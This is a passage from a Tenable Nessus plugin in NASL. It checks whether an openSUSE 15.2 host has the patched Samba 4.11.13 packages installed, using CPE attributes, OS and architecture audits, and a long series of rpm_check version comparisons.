value:\"p-cpe:/a:novell:opensuse:libdcerpc-samr0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-samr0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-samr0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-krb5pac-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-krb5pac0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-krb5pac0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-krb5pac0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-krb5pac0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-nbt-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-nbt0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-nbt0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-nbt0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-nbt0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-standard-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-standard0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-standard0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-standard0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-standard0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libnetapi-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libnetapi-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libnetapi0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libnetapi0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libnetapi0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libnetapi0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-credentials-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-credentials0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-credentials0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-credentials0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-credentials0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-errors-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-errors0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-errors0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-errors0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-errors0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-hostconfig-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-hostconfig0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-hostconfig0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-hostconfig0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-hostconfig0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-passdb-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-passdb0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-passdb0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-passdb0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-passdb0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-policy-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-policy-python3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-policy0-python3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-policy0-python3-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-policy0-python3-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-policy0-python3-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-util-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-util0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-util0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-util0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-util0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamdb-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamdb0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamdb0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamdb0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamdb0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbclient0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbclient0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbclient0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbclient0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbconf-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbconf0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbconf0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbconf0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbconf0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbldap-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbldap2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbldap2-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbldap2-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbldap2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtevent-util-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtevent-util0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtevent-util0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtevent-util0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtevent-util0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwbclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwbclient0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwbclient0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwbclient0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwbclient0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-ad-dc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-ad-dc-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-ad-dc-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-ad-dc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-ceph\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-ceph-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-client-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-client-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-client-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-core-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-dsdb-modules\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-dsdb-modules-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-libs-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-libs-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-libs-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-libs-python3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-libs-python3-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-libs-python3-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-libs-python3-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-python3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-python3-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-test-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-winbind-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-winbind-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-winbind-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.2\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.2\", reference:\"ctdb-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"ctdb-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"ctdb-pcp-pmda-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"ctdb-pcp-pmda-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"ctdb-tests-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"ctdb-tests-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libdcerpc-binding0-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libdcerpc-binding0-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libdcerpc-devel-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libdcerpc-samr-devel-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libdcerpc-samr0-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libdcerpc-samr0-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libdcerpc0-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libdcerpc0-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libndr-devel-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libndr-krb5pac-devel-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libndr-krb5pac0-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libndr-krb5pac0-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libndr-nbt-devel-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libndr-nbt0-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libndr-nbt0-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libndr-standard-devel-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libndr-standard0-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libndr-standard0-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libndr0-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libndr0-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libnetapi-devel-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libnetapi0-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libnetapi0-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamba-credentials-devel-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamba-credentials0-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamba-credentials0-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamba-errors-devel-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamba-errors0-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamba-errors0-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamba-hostconfig-devel-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamba-hostconfig0-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamba-hostconfig0-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamba-passdb-devel-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamba-passdb0-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamba-passdb0-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamba-policy-devel-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamba-policy-python3-devel-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamba-policy0-python3-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamba-policy0-python3-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamba-util-devel-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamba-util0-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamba-util0-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamdb-devel-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamdb0-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamdb0-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsmbclient-devel-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsmbclient0-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsmbclient0-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsmbconf-devel-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsmbconf0-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsmbconf0-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsmbldap-devel-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsmbldap2-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsmbldap2-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libtevent-util-devel-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libtevent-util0-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libtevent-util0-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libwbclient-devel-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libwbclient0-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libwbclient0-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-ad-dc-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-ad-dc-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-client-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-client-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-core-devel-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-debugsource-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-dsdb-modules-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-dsdb-modules-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-libs-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-libs-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-libs-python3-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-libs-python3-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-python3-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-python3-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-test-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-test-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-winbind-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-winbind-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libdcerpc-binding0-32bit-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libdcerpc-binding0-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libdcerpc-samr0-32bit-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libdcerpc-samr0-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libdcerpc0-32bit-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libdcerpc0-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libndr-krb5pac0-32bit-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", 